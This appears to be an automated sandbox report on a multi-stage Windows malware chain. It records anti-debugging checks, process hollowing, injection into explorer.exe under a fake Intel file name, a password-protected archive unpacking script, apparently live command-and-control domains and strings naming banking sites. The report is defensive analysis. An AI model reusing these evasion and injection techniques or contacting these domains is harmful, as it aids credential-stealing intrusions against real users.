                          Source: d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355445678.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377056263.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270396851.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWbU
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375048066.000000000131C000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2376845884.000000000131C000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355445678.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377056263.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270396851.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.2341019039.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2617124974.00000000012E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: skotes.exe, 00000006.00000002.2681819982.00000000013D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: 9f237e29d5.exe, 0000002F.00000003.2617124974.00000000012E2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000002.2618903054.00000000012E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: PING.EXE, 00000022.00000002.2348279303.0000015DF78EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                          Source: svchost.exe, 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: svchost.exe, 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: file.exe, 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, 80f68847d3.exe, 00000023.00000002.2383615819.0000000000A8A000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: file.exe, 00000000.00000000.1409061451.0000000000A81000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000000.1434396421.00000000007F1000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.1997684618.00000000007F1000.00000080.00000001.01000000.00000007.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: PING.EXE, 00000028.00000002.2376508917.0000027843D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnn
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeAPI call chain: ExitProcess graph end nodegraph_8-14466
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess queried: DebugPort
                          Source: C:\Windows\explorer.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04EF022E rdtsc 0_2_04EF022E
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00925020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00925020
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C652B mov eax, dword ptr fs:[00000030h]0_2_008C652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CA302 mov eax, dword ptr fs:[00000030h]0_2_008CA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0063A302 mov eax, dword ptr fs:[00000030h]2_2_0063A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0063652B mov eax, dword ptr fs:[00000030h]2_2_0063652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0063A302 mov eax, dword ptr fs:[00000030h]6_2_0063A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0063652B mov eax, dword ptr fs:[00000030h]6_2_0063652B
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0094519E mov edi, dword ptr fs:[00000030h]8_2_0094519E
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00921614 mov edi, dword ptr fs:[00000030h]8_2_00921614
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_00921614 mov edi, dword ptr fs:[00000030h]10_2_00921614
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0092FE2C GetProcessHeap,8_2_0092FE2C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00925014 SetUnhandledExceptionFilter,8_2_00925014
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00925020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00925020
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0092B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0092B4B9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_00924C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00924C64
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_00925014 SetUnhandledExceptionFilter,10_2_00925014
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_00925020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00925020
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_0092B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0092B4B9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_00924C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00924C64

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0094519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,8_2_0094519E
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeMemory written: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeMemory written: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 140000000 value: 4D
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 140001000 value: 40
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 1402DD000 value: 58
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 14040B000 value: A4
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 140739000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 14075E000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 14075F000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 140762000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 140764000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 140765000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6744 base: 21D010 value: 00
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                          Source: d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                          Source: 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 6744
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: C:\Windows\explorer.exe base: 21D010
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe "C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe "C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeProcess created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe"
                          Source: file.exe, 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ow+GmProgram Manager
                          Source: 80f68847d3.exe, 00000023.00000002.2383615819.0000000000A8A000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Program Manager
                          Source: skotes.exe, skotes.exe, 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: w+GmProgram Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0061DD91 cpuid 6_2_0061DD91
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,8_2_00933086
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,8_2_009330D1
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00933178
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00932A13
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,8_2_0092F21C
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,8_2_0093327E
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00932CFF
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,8_2_00932C64
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,8_2_00932FB1
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,8_2_0092F717
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,8_2_00932F52
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,10_2_00933086
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,10_2_009330D1
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_00933178
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_00932A13
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,10_2_0092F21C
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,10_2_0093327E
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_00932CFF
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,10_2_00932C64
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: GetLocaleInfoW,10_2_00932FB1
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,10_2_0092F717
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: EnumSystemLocalesW,10_2_00932F52
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
